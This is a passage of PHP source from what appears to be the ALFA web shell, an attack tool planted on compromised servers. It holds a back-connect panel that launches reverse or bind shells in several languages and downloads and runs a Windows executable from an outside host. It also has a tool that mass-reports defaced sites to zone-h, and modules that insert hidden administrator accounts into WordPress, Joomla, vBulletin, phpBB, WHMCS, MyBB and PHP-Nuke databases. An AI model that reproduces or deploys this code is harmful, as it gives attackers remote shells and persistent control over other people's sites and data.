        $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
        echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
        echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">\r\n<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
        $cbArr = array("php" => "Php", "perl" => "Perl", "python" => "Python", "ruby" => "Ruby", "c" => "C", "java" => "Java", "node" => "NodeJs", "bcwin" => "Windows");
        foreach ($cbArr as $key => $val) {
            echo "<option value='{$key}' " . ($GLOBALS['sys'] == 'win' ? 'selected' : '') . ">{$val}</option>";
        }
        echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
        if (isset($_POST['alfa1']) && !empty($_POST['alfa1'])) {
            $lang = $_POST['alfa1'];
            $ip = $_POST['alfa2'];
            $port = $_POST['alfa3'];
            $arg = $_POST['alfa4'] == 'bind' ? $port : $port . ' ' . $ip;
            $tmpdir = ALFA_TEMPDIR;
            $name = "ALFA_TEMPDIR/" . $lang . uniqid() . rand(1, 99999);
            $allow = array('perl', 'ruby', 'python', 'node');
            eval('$lan=$' . $lang . ';');
            if (in_array($lang, $allow)) {
                if (__write_file($name, __get_resource($lan))) {
                    if (_alfa_can_runCommand(true, true)) {
                        $os = $GLOBALS['sys'] != 'win' ? '1>/dev/null 2>&1 &' : '';
                        $out = alfaEx("{$lang} {$name} {$arg} {$os}");
                        if ($out == '') {
                            $out = "<font color='green'><center>[ Finished...! ]</center></font>";
                        }
                        echo "<pre class='ml1' style='margin-top:5px'>{$out}</pre>";
                    }
                } else {
                    echo "<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>";
                }
            }
            if ($lang == 'java' || $lang == 'c') {
                $code = __get_resource($lan);
                $out = nl2br(bcinit($lang, $code, '', ''));
                echo "<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>";
            }
            if ($lang == 'bcwin') {
                $alfa = new AlfaCURL();
                $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
                $tmpdir = ALFA_TEMPDIR;
                $f = @fopen("ALFA_TEMPDIR/bcwin.exe", 'w+');
                @fwrite($f, $s);
                @fclose($f);
                $out = alfaEx("ALFA_TEMPDIR/bcwin.exe " . $_POST['alfa2'] . " " . $_POST['alfa3']);
            }
            if ($lang == 'php') {
                echo "<pre class=ml1 style='margin-top:5px'>";
                $code = __get_resource($lan);
                if ($code !== false) {
                    $code = "\$target = \"" . $arg . "\";\n" . $code;
                    eval($code);
                    echo "<center><font color='green'>[ Finished...! ]</font></center>";
                }
                echo "</pre>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfazoneh()
    {
        alfahead();
        echo "<div class=header>";
        if (!function_exists('curl_version')) {
            echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
        }
        $hackmode = array('known vulnerability (i.e. unpatched system)', 'undisclosed (new) vulnerability', 'configuration / admin. mistake', 'brute force attack', 'social engineering', 'Web Server intrusion', 'Web Server external module intrusion', 'Mail Server intrusion', 'FTP Server intrusion', 'SSH Server intrusion', 'Telnet Server intrusion', 'RPC Server intrusion', 'Shares misconfiguration', 'Other Server intrusion', 'SQL Injection', 'URL Poisoning', 'File Inclusion', 'Other Web Application bug', 'Remote administrative panel access bruteforcing', 'Remote administrative panel access password guessing', 'Remote administrative panel access social engineering', 'Attack against administrator(password stealing/sniffing)', 'Access credentials through Man In the Middle attack', 'Remote service password guessing', 'Remote service password bruteforce', 'Rerouting after attacking the Firewall', 'Rerouting after attacking the Router', 'DNS attack through social engineering', 'DNS attack through cache poisoning', 'Not available', 'Cross-Site Scripting');
        $reason = array('Heh...just for fun!', 'Revenge against that website', 'Political reasons', 'As a challenge', 'I just want to be the best defacer', 'Patriotism', 'Not available');
        echo "\r\n<center><br><div class=\"txtfont_header\">| Zone-h Mass Poster |</div><center><br>\r\n<form action=\"\" method=\"post\" onsubmit=\"g('zoneh',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,'>>'); return false;\">\r\n<input type=\"text\" name=\"defacer\" size=\"67\" id=\"text\" placeholder=\"ALFA TEaM 2012\" />\r\n<br>\r\n<select id=\"text\" name=\"hackmode\" style=\"width:400px;\">";
        $x = 1;
        foreach ($hackmode as $mode) {
            echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
            $x++;
        }
        echo "</select><br><select id=\"text\" name=\"reason\" style=\"width:200px;\">";
        $x = 1;
        foreach ($reason as $mode) {
            echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
            $x++;
        }
        echo "</select><br>\r\n<textarea name=\"domain\" cols=\"90\" rows=\"20\" placeholder=\"Domains...\"></textarea><br>\r\n<p><input type=\"submit\" value=\" \" name=\"go\" /></p>\r\n</form></center>";
        if ($_POST['alfa5'] && $_POST['alfa5'] == '>>') {
            ob_start();
            $hacker = $_POST['alfa1'];
            $method = $_POST['alfa2'];
            $neden = $_POST['alfa3'];
            $site = $_POST['alfa4'];
            if (empty($hacker)) {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
            } elseif ($method == "------------------------------------SELECT-------------------------------------") {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
            } elseif ($neden == "------------------------------------SELECT-------------------------------------") {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
            } elseif (empty($site)) {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
            }
            $i = 0;
            $sites = explode("\n", $site);
            $alfa = new AlfaCURL();
            while ($i < count($sites)) {
                if (substr($sites[$i], 0, 4) != "http") {
                    $sites[$i] = "http://" . $sites[$i];
                }
                $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden);
                ++$i;
            }
            echo __pre() . "<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfapwchanger()
    {
        alfahead();
        echo "<div class=header><center><br><div class=\"txtfont_header\">| Add New Admin |</div>\r\n<center><h3>";
        $vals = array('WordPress' => array('wp', 2), 'Joomla' => array('joomla', 3), 'vBulletin' => array('vb', 5), 'phpBB' => array('phpbb', 6), 'WHMCS' => array('whmcs', 7), 'MyBB' => array('mybb', 8), 'Php Nuke' => array('nuke', 9), 'Drupal' => array('drupal', 10), 'SMF' => array('smf', 11));
        Alfa_Create_A_Tag('pwchanger', $vals);
        echo "</h3></center>";
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp') {
            echo __pre() . '<center><center><div class="txtfont_header">| WordPress |</div>
<p>' . getConfigHtml('wp') . '</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form>";
            if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
                $localhost = $_POST['alfa3'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'{$admin}','d4a590caacc0be55ef286e40a945ea45','{$SQL}')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn));
                $sole = @mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = @mysqli_fetch_assoc($solevisible);
                    $res = $solevis['ID'];
                }
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla') {
            echo __pre() . '<center><center><div class="txtfont_header">| Joomla |</div><p><p>' . getConfigHtml('joomla') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa3'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn));
                $sole = @mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = @mysqli_fetch_assoc($solevisible);
                    $res = $solevis['id'];
                }
                $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb') {
            echo __pre() . '<center><center><div class="txtfont_header">| vBulletin |<div><p>' . getConfigHtml('vb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_connect_error());
                $pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
                $pw_col = @mysqli_num_rows($pw_col);
                $adm_perm = "16744444";
                if ($pw_col > 0) {
                    $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','{$admin}','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','{$SQL}','" . date('Y-m-d') . "','" . time() . "')") or die(mysqli_error($conn));
                } else {
                    $adm_perm = "2143256444";
                    $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','{$admin}','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','{$SQL}','" . date('Y-m-d') . "','" . time() . "','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
                }
                $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn));
                $sole = mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = mysqli_fetch_assoc($solevisible);
                    $res = $solevis['userid'];
                }
                $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','" . $adm_perm . "')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb') {
            echo __pre() . '<center><div class="txtfont_header">| phpBB |</div><p><p>' . getConfigHtml('phpbb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $hash = md5('solevisible');
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs') {
            echo __pre() . '<center><div class="txtfont_header">| Whmcs |</div><p><p>' . getConfigHtml('whmcs') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb') {
            echo __pre() . '<center><div class="txtfont_header">| Mybb |</div><p><p>' . getConfigHtml('mybb') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke') {
            echo __pre() . '<center><div class="txtfont_header">| PhpNuke |</div><p><p>' . getConfigHtml('phpnuke') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa7'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $hash = md5($pwd);
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('{$admin}','God','{$SQL}','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal') {
            echo __pre() . '<center><div class="txtfont_header">| Drupal |</div><p><p>' . getConfigHtml('drupal') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
